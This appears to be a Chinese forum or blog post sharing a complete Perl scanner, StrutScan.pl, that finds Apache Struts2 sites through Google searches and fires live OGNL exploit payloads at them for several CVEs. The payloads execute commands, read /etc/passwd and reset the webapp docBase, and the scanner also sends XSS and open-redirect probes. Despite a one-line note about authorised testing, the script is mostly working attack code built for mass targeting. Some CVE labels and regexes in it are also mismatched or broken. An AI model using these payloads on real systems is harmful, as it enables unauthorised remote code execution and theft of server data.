
Struts2检测脚本--多版本

版本最齐全的检测脚本,保存为 xx.pl 后用 perl xx.pl 运行(依赖 LWP::UserAgent、URI::Escape 等 CPAN 模块)。注意:脚本向目标发送的是真实利用载荷(执行命令、读取 /etc/passwd、修改 docBase),仅可用于已获授权的测试。
  1. # !/url/bin/perl -w
  2. # Name  : StrutScan.pl V2.0
  3. # Author: riusksk
  4. # Blog  : http://riusksk.blogbus.com
  5. # Date  : 2014-04-23

  6. no  warnings;
  7. use strict;
  8. use LWP::UserAgent;
  9. use HTTP::Cookies;
  10. use Encode;
  11. use URI::Escape;
  12. use Getopt::Long;

  13. my ($keyword, $page, $url, $cmd, $help);
  14. my @result = ();
  15. my $entireurl = "";

  16. GetOptions(
  17.     'g=s' => \$keyword,
  18.     'p=s' => \$page,
  19.     'u=s' => \$url,
  20.     'c=s' => \$cmd,
  21.     'h!' => \$help,
  22. );

  23. if(!defined $keyword && !defined $url || defined $help){
  24.     &usage();
  25. }

  26. if(defined $keyword) {
  27.     my @urls = &google();
  28.     foreach my $url(@urls){
  29.         chomp($url);
  30.         if($url){
  31.             &audit($url);
  32.         }
  33.     }
  34. }


  35. if(defined $url){
  36.     &audit($url);
  37. }

  38. if(@result){
  39.     print("\n[*] 共发现".@result."个漏洞:\n\n");
  40.     print "@result\n";
  41. }
  42. else{print "\n[*] 未发现漏洞!\n\n"};

  43. sub usage(){
  44.     print "\n";
  45.     print "Usage:   perl\t StructScan.pl \n";
  46.     print "\t -g\t Google 搜索语句 \n";
  47.     print "\t -p\t 搜索结果的起始页数,默认从第1页开始\n";
  48.     #print "\t -c\t 执行的命令\n";
  49.     print "\t -u\t 指定网址\n";
  50.     print "\t -h\t 帮助信息\n\n";
  51.     print "Example: perl StructScan.pl -g \"site:qq.com filetype:action\" -p 1\n\n";
  52.     exit;
  53. }

  54. sub google{
  55.    
  56.     my @urls = ();
  57.     my @actionurls = ();
  58.     my $url = "";
  59.     if ($page < 1){
  60.         $page = 1;
  61.     }
  62.     my $start = 100 * ($page-1);
  63.    
  64.     # 通过google搜索action 文件
  65.         my $ua = new LWP::UserAgent;
  66.     $ua->agent("Mozilla/5.0 (X11; Linux i686; rv:2.0.0) Gecko/20130130");
  67.     $ua->max_redirect( 0 );
  68.     my $response = $ua->get( "http://www.google.com.au/search?hl=zh-CN&q=".$keyword."&num=100&start=".$start )
  69.         or die ("[*] google请求失败,请重试!\n");
  70.     #print $response->content."\n";
  71.     my $content = $response->content;
  72.    
  73.     if($content=~/找不到和您的查询/g){
  74.             die("[*] 搜索不到相关信息!\n\n");
  75.     }
  76.     # 提取搜索结果中的文件链接
  77.     my @urls = $content =~ /<cite>(.*?)<\/cite>/ig;

  78.     foreach my $url(@urls){
  79.         
  80.         chomp($url);
  81.         $entireurl = $url;        # 保存完整的action\do\xhtml文件链接,包括其参数
  82.         # print"完整链接:$entireurl\n";
  83.         $url =~ /(.+?\.(action|do|xhtml))/i;
  84.         $url = $1;
  85.         $url = "http://".$url;
  86.         #print "链接:$url\n";
  87.         push(@actionurls,$url);
  88.     }
  89.     # print @actionurls;
  90.     my %seen = ();
  91.     @actionurls = grep(!$seen{$_}++ , @actionurls);  # 删除重复的文件地址
  92.     return @actionurls;
  93.     #print @urls;

  94. }


  95. sub audit(){
  96.        
  97.         my $url = $_[0];
  98.         print "\n[*]检测链接:$url\n";

  99. =pod
  100.         if(defined $cmd){
  101.                 $temp = $cmd;
  102.                 $cmd = uri_escape($cmd);
  103.                 $cmd =~ s/\%20/+/g;
  104.         }
  105.         else{
  106.                 $cmd = "help";
  107.         }

  108.         print "命令:$cmd\n";
  109. =cut

  110.         my $ua = new LWP::UserAgent;
  111.     $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)");
  112.     $ua->max_redirect( 0 );


  113.     print "[*]检测 CVE-2010-1870 Struts2/XWork < 2.2.0 远程代码执行漏洞\n";
  114.     my $payload1 = '?(\'\43_memberAccess.allowStaticMethodAccess\')(a)=true&(b)((\'\43context[\\\'xwork.MethodAccessor.denyMethodExecution\\\']\75false\')(b))&(\'\43c\')((\'\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET\')(c))&(g)((\'\43req\75@org.apache.struts2.ServletActionContext@getRequest()\')(d))&(h)((\'\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))\')(d))&(i)((\'\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())\')(d))&(i01)((\'\43webStr\75new\40byte[51020]\')(d))&(i1)((\'\43webRootzproreader.readFully(\43webStr)\')(d))&(i111)((\'\43webStr12\75new\40java.lang.String(\43webStr)\')(d))&(i2)((\'\43xman\75@org.apache.struts2.ServletActionContext@getResponse()\')(d))&(i2)((\'\43xman\75@org.apache.struts2.ServletActionContext@getResponse()\')(d))&(i95)((\'\43xman.getWriter().println(\43webStr12)\')(d))&(i99)((\'\43xman.getWriter().close()\')(d))&cmd=help';
  115.     # print"攻击代码:$payload1\n";
  116.     my $response1 = $ua->get( "$url$payload1")
  117.         or die ("[*] 请求失败,请重试!\n");
  118.     # print $response1->content."\n";
  119.     my $content1 = $response1->content;
  120.     if( ($content1=~/BOOTCFG/ig) || ($content1=~/help\ name/ig) ){
  121.             print "[*]存在 CVE-2010-1870 漏洞!\n";
  122.                 push(@result, $url.$payload1."\n\n");
  123.     }

  124.     # 需要检测参数名来注入恶意代码
  125.     print"[*]检测 CVE-2012-0391 Apache Struts2 <= 2.2.1.1 ExceptionDelegator 远程代码执行漏洞\n";
  126.     my $payload2 = "?id='%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,\@org.apache.commons.io.FileUtils\@readFileToString(new%20java.io.File(%22/etc/passwd%22))%2b'";
  127.     my $response2 = $ua->get( "$url$payload2")
  128.         or die ("[*] 请求失败,请重试!\n");
  129.     my $content2 = $response2->content;
  130.     if( ($content2=~/root/ig) && ($content2=~/\/bash\/bash/ig) ){
  131.             print "[*] 存在 CVE-2012-0394  漏洞!\n";
  132.                 push(@result, $url.$payload2."\n\n");
  133.     }

  134.     print"[*]检测 CVE-2012-0394 Apache Struts2 <= 2.3.1 DebuggingInterceptor 远程代码执行漏洞\n";
  135.     my $payload3 = "?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,\@org.apache.commons.io.FileUtils\@readFileToString(new%20java.io.File(%22/etc/passwd%22))";
  136.     my $response3 = $ua->get( "$url$payload3")
  137.         or die ("[*] 请求失败,请重试!\n");
  138.     my $content3 = $response3->content;
  139.     if( ($content3=~/root/ig) && ($content3=~/\/bin\/bash/ig) ){
  140.             print "[*] 存在 CVE-2012-0394 漏洞!\n";
  141.                 push(@result, $url.$payload3."\n\n");
  142.     }


  143.     print"[*]检测 CVE-2012-0392 Apache Struts2 <= 2.2.1.1 CookieInterceptor 远程代码执行漏洞\n";
  144.     my $cookie = HTTP::Cookies->new;
  145.     $cookie->clear;
  146.     $cookie->set_cookie("(#_memberAccess[\"allowStaticMethodAccess\"]\u003dtrue)(x)=1; x[\@org.apache.commons.io.FileUtils\@readFileToString(new%20java.io.File(%22/etc/passwd%22)]=1");
  147.     $ua->cookie_jar($cookie);
  148.     my $response4 = $ua->get( "$url")
  149.         or die ("[*] 请求失败,请重试!\n");
  150.     my $content4 = $response4->content;
  151.     if( ($content4=~/root/ig) && ($content4=~/\/bin\bash/ig) ){
  152.             print "[*] 存在 CVE-2012-0394  漏洞!\n";
  153.                 push(@result, $url."\n".$cookie."\n\n");
  154.     }

  155.     print"[*]检测 Struts 2.0.0 - 2.0.11 XSS 漏洞\n";
  156.     my $xss = "?<script>alert(1)</script>test=hello";
  157.     $xss = uri_escape($xss);
  158.     my $response5 = $ua->get( "$url$xss")
  159.         or die ("[*] 请求失败,请重试!\n");
  160.     my $content5 = $response5->content;
  161.     if( $content5=~/\<script\>alert\(1\)\<\/script\>/ig ){
  162.             print "[*] 存在 XSS 漏洞!\n";
  163.                 push(@result, $url.$xss."\n\n");
  164.     }
  165.    
  166.     print"[*]检测 CVE-2011-1772 Struts 2.0.0 - 2.2.1.1 XWork XSS 漏洞\n";
  167.     my $xss1 = "!login:cantLogin<script>alert(1)</script>=some_value";
  168.     $xss1 = uri_escape($xss1);
  169.     my $response6 = $ua->get("$url$xss1")
  170.             or die ("[*] 请求失败,请重试!\n");
  171.     my $content6 = $response6->content;
  172.     if($content6=~/\<script\>alert\(1\)\<\/script\>/ig){
  173.              print "[*] 存在 XSS 漏洞!\n";
  174.                 push(@result, $url.$xss1."\n\n");          
  175.     }

  176.     print"[*]检测 CVE-2011-3923 Apache Struts2 ParametersInterceptor 远程代码执行漏洞\n";
  177.     my $payload7 = "?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20\@java.lang.Runtime\@getRuntime%28%29.exec%28%27help%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true";
  178.     my $response7 = $ua->get( "$url$payload7")
  179.         or die ("[*] 请求失败,请重试!\n");
  180.     my $content7 = $response7->content;
  181.     if( ($content7=~/BOOTCFG/ig) || ($content7=~/help\ name/ig) ){
  182.             print "[*] 存在 CVE-2012-0394 漏洞!\n";
  183.                 push(@result, $url.$payload7."\n\n");
  184.     }

  185. =pod
  186.     print"[*]检测 Struct2 Java 浮点DoS漏洞\n";
  187.     my $payload8 = "?(new java.lang.Double(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022250738585072012))";
  188.     my $response8 = $ua->get( "$url$payload8")
  189.         or die ("[*] 请求失败,请重试!\n");
  190.     #sleep(5);
  191.     my @tmp = split('//',$url);
  192.     my @site = split('/',$tmp[1]);
  193.     my $site = $site[0];
  194.     #print"站点:$site\n";
  195.     my @ping = readpipe("ping -c 5 $site");
  196.     #print @ping;
  197.     foreach my $ping(@ping){
  198.             if($ping=~/timeout/ig){
  199.                     print"[*] 存在 Java 浮点DoS漏洞\n";
  200.                     push(@result, $url.$payload8."\n");
  201.                     return;
  202.             }
  203.     }
  204. =cut

  205.     print"[*]检测 CVE-2013-2251 Apache Struts2 redirect 远程代码执行漏洞\n";
  206.     my $payload9 = "?redirect:\$\{%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(\"netstat\"),%23xx%3dnew%20java.lang.String(\"-an\"),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23mbqdpz%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23mbqdpz.println(%23d),%23mbqdpz.close()\}";
  207.     my $response9 = $ua->get("$url$payload9")
  208.             or die ("[*] 请求失败,请重试!\n");
  209.     my $content9 = $response9->content;
  210.     if( ($content9=~/Active\ Internet\ connections/ig) && ($content9=~/tcp/ig) ){
  211.             print "[*] 存在 CVE-2013-2251 漏洞!\n";
  212.             push(@result, $url.$payload9."\n\n");
  213.     }

  214.     print"[*]检测 CVE-2013-2248 Apache Struts2 redirect/redirectAction 重定向漏洞\n";
  215.     my $payload10 = "?redirect:http://www.baidu.com/";
  216.     my $response10 = $ua->get("$url$payload10")
  217.         or die ("[*] 请求失败,请重试!\n");
  218.     my $content10 = $response10->content;
  219.     if( $content10=~/百度一下\,你就知道/ig ){
  220.         print "[*] 存在 CVE-2013-2248 漏洞!\n";
  221.         push(@result, $url.$payload10."\n\n");
  222.     }

  223.     print"[*]检测 CVE-2014-0094 Apache Struts2 ClassLoader Manipulation 远程代码执行漏洞\n";
  224.     my $payload11 = "?Class[%27classLoader%27][%27resources%27].dirContext.docBase=/";
  225.     my $response11 = $ua->get("$url$payload11")
  226.         or die ("[*] 请求失败,请重试!\n");
  227.     my $loc = rindex($url,'/');
  228.     my $newurl = substr($url,0,$loc);
  229.     my $payload11_2 = "etc/passwd";
  230.     $response11 = $ua->get("$newurl$payload11_2")
  231.         or die ("[*] 请求失败,请重试!\n");
  232.     my $content11 = $response11->content;
  233.     if( $content11=~/root\:\/bin/ig ){
  234.         print "[*] 存在 CVE-2014-0094 漏洞!\n";
  235.         push(@result, $url.$payload11_2."\n\n");
  236.     }
  237. }
